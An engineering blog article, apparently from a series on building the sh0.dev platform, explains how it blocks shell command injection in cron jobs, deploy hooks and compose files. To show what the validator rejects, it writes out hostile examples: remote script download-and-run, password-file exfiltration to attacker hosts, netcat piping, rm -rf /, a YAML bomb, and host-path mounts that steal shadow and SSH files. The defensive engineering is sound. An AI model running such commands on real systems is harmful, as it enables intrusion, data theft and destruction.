Preventing Command Injection in a PaaS

Here is the fundamental paradox of building a Platform-as-a-Service: the entire point of the product is to run user-provided commands. Deploy hooks execute npm run build. Cron jobs run python cleanup.py. Docker exec sessions pass shell commands to running containers. You cannot simply reject all user input that looks like a command -- commands are the product.

But a PaaS that runs arbitrary shell input is one semicolon away from catastrophe. npm run build; curl attacker.com/shell.sh | bash looks like a build command with a creative suffix. It is actually arbitrary code execution on your infrastructure.

This article covers how we built command injection prevention for sh0.dev: the validate_command() function, the three attack surfaces it protects, and the complementary defenses that make the system safe without making it unusable.

The Three Attack Surfaces

sh0 accepts user-provided commands in three places, each with different trust levels and execution contexts:

1. Cron Jobs

Users define scheduled tasks with a cron expression and a command string. The command runs inside the application's container on the defined schedule. This is the highest-risk surface because cron jobs run unattended -- there is no human watching the output, and a malicious command could execute for weeks before anyone notices.

2. Deploy Hooks

Pre-deploy and post-deploy hooks run as part of the deployment pipeline. A pre-deploy hook might run database migrations; a post-deploy hook might clear a cache or send a notification. These commands execute in the build or application container during the deploy process.

3. Docker Exec (Web Terminal)

The web terminal feature allows users to open a shell session inside a running container. This is inherently an arbitrary command execution interface -- that is its purpose. The defense here is different: authentication and authorization rather than command validation. But the Docker exec API itself needs protection against parameter injection.

Shell Metacharacter Injection

The core attack vector is shell metacharacter injection. When a command string is passed to sh -c, the shell interprets special characters before executing the command. These metacharacters enable command chaining, subshell execution, and I/O redirection:

Character	Effect
`;`	Command separator -- executes the next command regardless
`|`	Pipe -- feeds output to the next command
`&`	Background execution or command chaining (`&&`)
`` ` ``	Command substitution -- executes enclosed command
`$(`	Command substitution (modern syntax)
`>` / `<`	I/O redirection -- can overwrite files
`\n` / `\r`	Newline injection -- starts a new command

A cron job defined as python cleanup.py && curl attacker.com/exfil?data=$(cat /etc/shadow) combines two of these: && chains a second command after the legitimate one, and $( substitutes the output of cat /etc/shadow into the URL. The resulting command exfiltrates the shadow password file.
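The difference between a string interpreted by the shell and an argument vector passed directly to a program can be seen in a small experiment. This is a minimal sketch, assuming a POSIX environment where sh and echo are on the PATH; the helper names run_via_shell and run_direct are hypothetical and not part of sh0.

```rust
use std::process::Command;

/// Runs `cmd` through `sh -c`, so the shell interprets metacharacters.
fn run_via_shell(cmd: &str) -> String {
    let out = Command::new("sh")
        .arg("-c")
        .arg(cmd)
        .output()
        .expect("failed to spawn sh");
    String::from_utf8_lossy(&out.stdout).into_owned()
}

/// Runs `program` directly with an argument vector. No shell is involved,
/// so a `;` inside an argument is just another byte.
fn run_direct(program: &str, args: &[&str]) -> String {
    let out = Command::new(program)
        .args(args)
        .output()
        .expect("failed to spawn program");
    String::from_utf8_lossy(&out.stdout).into_owned()
}
```

Calling run_via_shell("echo one; echo two") executes two commands, while run_direct("echo", &["one;", "echo", "two"]) executes one command that prints its arguments verbatim. The injection risk lives entirely in the first form.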

The validate_command() Function

Our defense is a strict validation function that rejects commands containing shell metacharacters. The function runs at the API boundary -- before the command is stored in the database, before it is queued for execution, before it touches any shell.

const FORBIDDEN_CHARS: &[char] = &[';', '|', '&', '`', '>', '<', '\n', '\r'];
const FORBIDDEN_PATTERNS: &[&str] = &["$(", "${"];
const MAX_COMMAND_LENGTH: usize = 4096; // in bytes: str::len() counts bytes, not chars

pub fn validate_command(cmd: &str) -> Result<(), ApiError> {
    // An empty command is never valid
    if cmd.is_empty() {
        return Err(ApiError::BadRequest("Command cannot be empty".into()));
    }
    // Length limit bounds memory use during validation, logging, and in downstream systems
    if cmd.len() > MAX_COMMAND_LENGTH {
        return Err(ApiError::BadRequest(
            format!("Command exceeds maximum length of {} bytes", MAX_COMMAND_LENGTH)
        ));
    }

    // Reject shell metacharacters
    for ch in FORBIDDEN_CHARS {
        if cmd.contains(*ch) {
            return Err(ApiError::BadRequest(
                format!("Command contains forbidden character: '{}'", ch)
            ));
        }
    }

    // Reject shell expansion patterns
    for pattern in FORBIDDEN_PATTERNS {
        if cmd.contains(pattern) {
            return Err(ApiError::BadRequest(
                format!("Command contains forbidden pattern: '{}'", pattern)
            ));
        }
    }

    Ok(())
}

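The 4096-character limit (checked in bytes, since cmd.len() counts bytes) is a conservative bound rather than a kernel constant. It sits far below Linux's per-argument limit (MAX_ARG_STRLEN, 128 KiB on systems with 4 KiB pages), so any command that passes validation fits comfortably in a single sh -c argument. It also prevents denial-of-service through extremely long command strings that consume memory during validation and logging.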

What This Allows

The validation is deliberately permissive for legitimate use cases:

python manage.py migrate -- no metacharacters, passes
npm run build -- no metacharacters, passes
/usr/bin/backup --output /data/backup.tar.gz -- flags and paths are fine
node scripts/cleanup.js --days 30 -- arguments with values pass
curl -X POST https://api.example.com/webhook -- URLs without metacharacters pass

What This Rejects

npm run build; rm -rf / -- semicolon rejected
echo "done" | nc attacker.com 4444 -- pipe rejected
python script.py && curl evil.com -- ampersand rejected
echo `whoami` -- backtick rejected
python -c "import os; os.system('$(cat /etc/passwd)')" -- rejected on the semicolon first; the $( would be rejected as well
node app.js > /dev/null -- redirection rejected
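The accept and reject lists above can be checked mechanically. The sketch below mirrors the checking order of validate_command() (characters first, in list order, then patterns) but returns the offending token instead of an ApiError so it stays self-contained. The function name first_violation is hypothetical.

```rust
const FORBIDDEN_CHARS: &[char] = &[';', '|', '&', '`', '>', '<', '\n', '\r'];
const FORBIDDEN_PATTERNS: &[&str] = &["$(", "${"];

/// Returns the first forbidden character or pattern found in `cmd`,
/// or None if the command would pass the metacharacter checks.
/// Characters are checked before patterns, in the order listed above.
fn first_violation(cmd: &str) -> Option<String> {
    for ch in FORBIDDEN_CHARS {
        if cmd.contains(*ch) {
            return Some(ch.to_string());
        }
    }
    for pattern in FORBIDDEN_PATTERNS {
        if cmd.contains(*pattern) {
            return Some(pattern.to_string());
        }
    }
    None
}
```

Because the check walks the forbidden list in order rather than scanning the command left to right, the token reported is the first match in the list, not necessarily the first one in the command. A command containing both a semicolon and $( is reported for the semicolon.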

The False Positive Question

The most common objection to metacharacter rejection is false positives. "What if my cron job legitimately needs a pipe?" The answer: write a script. Instead of cat log.txt | grep ERROR | wc -l, create a count_errors.sh file in your repository and set the cron command to bash /app/count_errors.sh. The script file can contain any shell syntax it wants -- the injection risk exists only at the command-string boundary where user input meets the shell.

This is not a limitation. It is a best practice. Shell one-liners in cron definitions are fragile, hard to test, and impossible to version control. Pushing complex logic into scripts improves maintainability regardless of security considerations.

Cron Jobs: Validation at Definition Time

Cron job commands are validated when the job is created or updated -- not when it executes. This is critical. If validation only happened at execution time, a malicious command would be stored in the database, visible in the UI, and potentially copied by other users before the validation kicks in.

pub async fn create_cron_job(
    auth: AuthUser,
    Path(app_id): Path<String>,
    Json(payload): Json<CreateCronJob>,
) -> Result<Json<Value>, ApiError> {
    require_app_access(&auth, &app_id, Role::Developer)?;

    // Validate command BEFORE storing
    validate_command(&payload.command)?;

    // Validate cron expression
    validate_cron_expression(&payload.schedule)?;

    // Enforce per-app limit
    let existing = db::cron_jobs::count_by_app(&app_id).await?;
    if existing >= 50 {
        return Err(ApiError::BadRequest("Maximum 50 cron jobs per app".into()));
    }

    // Safe to store and schedule
    let job = db::cron_jobs::create(&app_id, &payload).await?;
    Ok(Json(to_json(&job)?))
}

The per-app limit of 50 cron jobs is a secondary defense. Without it, an attacker could create thousands of cron jobs to exhaust scheduler resources -- a denial-of-service that does not require command injection.
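The handler above also calls validate_cron_expression(), which this article does not show. As a rough illustration only, here is a minimal stand-in, assuming the standard five-field syntax and returning a plain String error instead of ApiError. It checks field count and character set but not numeric ranges, and it rejects month or weekday names such as MON, which a real implementation might accept.

```rust
/// Hypothetical stand-in for validate_cron_expression(): accepts a
/// five-field expression whose fields contain only digits, '*', ',',
/// '-', and '/'. It does NOT check numeric ranges (e.g. minute <= 59).
fn validate_cron_expression(expr: &str) -> Result<(), String> {
    let fields: Vec<&str> = expr.split_whitespace().collect();
    if fields.len() != 5 {
        return Err(format!("expected 5 fields, found {}", fields.len()));
    }
    for field in &fields {
        let ok = field
            .chars()
            .all(|c| c.is_ascii_digit() || matches!(c, '*' | ',' | '-' | '/'));
        if !ok {
            return Err(format!("invalid characters in field '{}'", field));
        }
    }
    Ok(())
}
```

Validating the schedule with an allowlist of characters keeps the schedule field from becoming a second channel for smuggling shell syntax.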

Deploy Hooks: Validation Before Execution

Deploy hooks follow the same pattern but with an additional constraint: they execute in the context of the deployment pipeline, which has access to build artifacts, environment variables, and the Docker socket.

pub async fn execute_hooks(
    hooks: &[DeployHook],
    container_id: &str,
    phase: HookPhase,
) -> Result<(), DeployError> {
    for hook in hooks.iter().filter(|h| h.phase == phase) {
        // Re-validate even though it was validated at creation time
        // Defense in depth: the hook definition could have been modified
        validate_command(&hook.command)?;

        docker::exec(container_id, &["sh", "-c", &hook.command]).await?;
    }
    Ok(())
}

We validate at both creation time and execution time. The creation-time check prevents storage of malicious commands. The execution-time check is defense in depth -- if a database migration, a bug, or a direct database modification introduces a malicious command, the execution-time validation catches it.

YAML Bomb Protection

sh0 supports Docker Compose-style YAML configuration files for multi-container deployments. YAML parsing introduces its own class of injection attacks:

YAML bombs exploit YAML's anchor/alias feature to create exponential expansion:

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]

Each level multiplies by 9. Four levels produce 6,561 elements. Eight levels produce about 43 million, and ten levels produce about 3.5 billion. A YAML file well under 1 KB can consume gigabytes of memory during parsing.
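The growth described above is plain exponentiation: with a fan-out of 9 aliases per level, the element count after n levels is 9^n. A small helper makes the arithmetic easy to check. The function name expanded_elements is hypothetical.

```rust
/// Number of leaf elements after `levels` rounds of aliasing, where each
/// level references the previous one `fanout` times.
/// Returns None if the count overflows u64.
fn expanded_elements(fanout: u64, levels: u32) -> Option<u64> {
    fanout.checked_pow(levels)
}
```

For the example document, expanded_elements(9, 4) gives 6,561, and the count outgrows a 64-bit integer well before 30 levels.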

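The first defense is simple: reject YAML files larger than 256 KB before parsing. Legitimate Docker Compose files rarely exceed a few kilobytes, so the limit is generous enough for any real use case. On its own, though, a size cap does not stop a bomb like the one above, which is only a few hundred bytes; it bounds how many anchors and aliases an attacker can pack into one document. The expansion itself has to be capped during parsing, either by a parser that limits alias expansion or by limiting the number of alias references before deserializing.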

const MAX_YAML_SIZE: usize = 256 * 1024; // 256 KB

pub fn parse_compose(yaml_str: &str) -> Result<ComposeConfig, ApiError> {
    if yaml_str.len() > MAX_YAML_SIZE {
        return Err(ApiError::BadRequest(
            format!("YAML file exceeds maximum size of {} bytes", MAX_YAML_SIZE)
        ));
    }
    serde_yaml::from_str(yaml_str).map_err(|e| ApiError::BadRequest(e.to_string()))
}
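Because the example bomb is far smaller than 256 KB, a size check can be paired with a budget on alias references. The following is a heuristic sketch, not sh0's implementation: it scans the raw text for tokens that look like `*name` and rejects documents that use too many. The names count_alias_refs and check_alias_budget and the budget of 16 are assumptions made for illustration. A text scan can miscount (for example, an asterisk inside a quoted string), so it complements rather than replaces a parser-level limit.

```rust
// Hypothetical budget; not a value taken from sh0.
const MAX_ALIAS_REFS: usize = 16;

/// Heuristically counts YAML alias references (`*name`) in raw text.
fn count_alias_refs(yaml: &str) -> usize {
    let chars: Vec<char> = yaml.chars().collect();
    let mut count = 0;
    for (i, &c) in chars.iter().enumerate() {
        if c != '*' {
            continue;
        }
        // An alias starts a token: it follows start-of-input, whitespace,
        // or a flow-collection delimiter.
        let starts_token = i == 0
            || chars[i - 1].is_whitespace()
            || matches!(chars[i - 1], '[' | ',' | '{');
        // It must be followed by a name character.
        let has_name = chars
            .get(i + 1)
            .map_or(false, |n| n.is_alphanumeric() || *n == '_' || *n == '-');
        if starts_token && has_name {
            count += 1;
        }
    }
    count
}

/// Rejects documents whose alias count exceeds the budget.
fn check_alias_budget(yaml: &str) -> Result<(), String> {
    let n = count_alias_refs(yaml);
    if n > MAX_ALIAS_REFS {
        Err(format!("YAML uses {} alias references (max {})", n, MAX_ALIAS_REFS))
    } else {
        Ok(())
    }
}
```

The four-level example above contains 27 alias references, so it would be rejected under this budget, while a Compose file that reuses a handful of anchors passes.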

Volume Path Traversal Prevention

Docker Compose configurations can specify volume mounts. A malicious configuration could attempt to mount host paths:

services:
  app:
    volumes:
      - /etc/shadow:/stolen/shadow:ro
      - ../../../root/.ssh:/stolen/ssh:ro

sh0 rejects any volume mount that specifies a host path. Only named volumes and anonymous volumes are allowed:

pub fn validate_volumes(volumes: &[String]) -> Result<(), ApiError> {
    for volume in volumes {
        // Named volumes: "mydata:/app/data"
        // Anonymous volumes: "/app/data"
        // Host paths: "/host/path:/container/path" or "./relative:/container/path"
        let parts: Vec<&str> = volume.split(':').collect();
        if parts.len() >= 2 {
            let source = parts[0];
            // Reject absolute, relative, and home-relative ('~') host paths
            if source.starts_with('/')
                || source.starts_with('.')
                || source.starts_with('~')
                || source.contains("..")
            {
                return Err(ApiError::BadRequest(
                    format!("Host path mounts are not allowed: {}", volume)
                ));
            }
        }
    }
    Ok(())
}
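A denylist of path prefixes has to anticipate every way a host path can be written. An alternative is to allowlist what a named volume may look like and reject everything else. The sketch below is one way to do that, assuming a naming rule of an ASCII letter or digit followed by letters, digits, '_', '.', or '-'. The rule, the helper names, and the String error type are assumptions for illustration, not sh0's code.

```rust
/// Returns true if `name` looks like a named volume under the assumed rule:
/// an ASCII letter or digit, followed by letters, digits, '_', '.', or '-'.
fn is_volume_name(name: &str) -> bool {
    let mut chars = name.chars();
    match chars.next() {
        Some(c) if c.is_ascii_alphanumeric() => {}
        _ => return false,
    }
    chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '_' | '.' | '-'))
}

/// Accepts "name:/container/path[:mode]" and anonymous "/container/path".
/// Anything whose source is not a plain volume name is treated as a host path.
fn validate_volume(volume: &str) -> Result<(), String> {
    match volume.split_once(':') {
        // No colon: an anonymous volume, which must be an absolute container path.
        None if volume.starts_with('/') => Ok(()),
        None => Err(format!("Invalid volume specification: {}", volume)),
        Some((source, _target)) if is_volume_name(source) => Ok(()),
        Some(_) => Err(format!("Host path mounts are not allowed: {}", volume)),
    }
}
```

With this shape, sources such as ~/secrets or data/sub are rejected without needing a dedicated rule for each, because neither matches the volume-name pattern.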

This is a fundamental security boundary in any container orchestration platform. Host path mounts bypass container isolation entirely. The container filesystem should be the container's concern; the host filesystem belongs to the platform.

Container Security Defaults

Beyond command validation, every container started by sh0 receives security defaults that limit the blast radius of any command that does execute:

no-new-privileges: true -- Prevents processes inside the container from gaining additional privileges through setuid or setgid binaries or file capabilities. An attacker who achieves code execution as an unprivileged user cannot use such binaries to escalate to root.
Memory limit: 512 MB -- Prevents a runaway process from consuming all host memory.
CPU limit: 1.0 CPU -- Prevents a compute-intensive attack from starving other containers.

These are applied to all containers by default. Users can adjust resource limits within defined bounds but cannot disable no-new-privileges.
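As an illustration of defaults with bounded overrides, the sketch below builds the equivalent docker run flags. It is written against the Docker CLI for readability; sh0 may well set these through the Docker API instead. The upper and lower bounds and the function name security_args are hypothetical, since the article does not state the allowed range.

```rust
const DEFAULT_MEMORY_MB: u64 = 512;
const DEFAULT_CPUS: f64 = 1.0;
// Hypothetical bounds for user overrides; the article does not specify them.
const MIN_MEMORY_MB: u64 = 64;
const MAX_MEMORY_MB: u64 = 4096;
const MIN_CPUS: f64 = 0.1;
const MAX_CPUS: f64 = 4.0;

/// Builds `docker run` flags for the security defaults. User-supplied
/// limits are clamped to the allowed range; no-new-privileges is always
/// present and cannot be turned off by the caller.
fn security_args(memory_mb: Option<u64>, cpus: Option<f64>) -> Vec<String> {
    let memory = memory_mb
        .unwrap_or(DEFAULT_MEMORY_MB)
        .clamp(MIN_MEMORY_MB, MAX_MEMORY_MB);
    let cpus = cpus.unwrap_or(DEFAULT_CPUS).clamp(MIN_CPUS, MAX_CPUS);
    vec![
        "--security-opt".to_string(),
        "no-new-privileges=true".to_string(),
        format!("--memory={}m", memory),
        format!("--cpus={:.1}", cpus),
    ]
}
```

The function signature has no parameter for the privilege flag at all, which is the simplest way to guarantee that no request path can disable it.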

The Defense-in-Depth Stack

No single defense is sufficient. Command injection prevention in sh0 is a stack of complementary measures:

Layer	Defense	Protects Against
1	`validate_command()`	Shell metacharacter injection
2	YAML size limit (256 KB)	YAML bombs / memory exhaustion
3	Volume mount rejection	Host filesystem access
4	`no-new-privileges`	Privilege escalation inside containers
5	Resource limits	DoS via resource consumption
6	RBAC enforcement	Unauthorized access to create cron/hooks
7	Audit logging	Post-incident forensics
8	Rate limiting	Brute-force command creation

An attacker would need to bypass multiple layers simultaneously. Even if validate_command() missed a novel injection technique, the container runs with restricted privileges, limited resources, no host filesystem access, and full audit logging.

Balancing Security with Usability

The hardest part of command injection prevention is not the implementation -- it is the user experience. Every rejected command is a frustrated user. The error messages must be specific enough that the user understands what to change:

400 Bad Request: Command contains forbidden character: '|'

is actionable. The user knows to remove the pipe and use a script instead.

400 Bad Request: Invalid command

is useless. The user has no idea what is wrong.

We also document the restriction in the dashboard UI. The cron job creation form and deploy hook configuration page both include a note explaining that shell metacharacters are not allowed and suggesting the script-file alternative for complex commands.

What We Considered and Rejected

Shell escaping instead of rejection. We could escape metacharacters instead of rejecting them -- turning ; into \;, | into \|, etc. We rejected this approach because escaping is fragile. Different shells handle escaping differently. Nested escaping (escaping an already-escaped string) is notoriously error-prone. A missed edge case in the escaping logic is a command injection vulnerability. Rejection is blunt but reliable.

Sandboxed shell execution. We could run commands in a restricted shell (rbash) or use seccomp profiles to limit system calls. This adds complexity and is shell-specific. We already run commands inside Docker containers with no-new-privileges -- the container itself is the sandbox.

AST-based command parsing. We could parse the command string into an abstract syntax tree and reject trees that contain multiple commands, redirections, or subshells. This is theoretically more precise but requires a full shell parser. Shell grammar is complex, inconsistent across implementations, and a parsed AST gives a false sense of security if the parsing does not exactly match the shell's behavior.

The simplest solution -- reject known-dangerous characters at the string level -- is the most robust of the options we considered. It has far fewer edge cases because it does not try to understand the command's semantics. It just rejects the characters that a POSIX shell uses for command chaining, substitution, and redirection.

Lessons Learned

Validate at the boundary, not at execution. Command validation happens when the user creates the cron job or deploy hook -- before the command touches the database. Execution-time validation is defense in depth, not the primary control.

Rejection beats escaping. Escaping shell metacharacters is fragile and shell-specific. Rejecting them is blunt, reliable, and easy to reason about.

The script-file pattern solves the usability problem. If users need complex shell logic, they should write a script file and set the command to execute it. This is better engineering practice regardless of security.

Defense in depth is not optional. No single layer is sufficient. Command validation, container isolation, resource limits, privilege restrictions, RBAC, and audit logging work together. An attacker must bypass all of them.

Error messages are a security UX feature. Specific error messages ("forbidden character: '|'") turn a frustrating rejection into a learning moment. Generic messages ("invalid command") generate support tickets.

This article is part of the "How We Built sh0.dev" series. sh0 is a self-hosted PaaS built in Rust by Juste Thales Gnimavo and Claude in 14 days with zero human engineers. Follow the series for deep dives into every layer of the platform.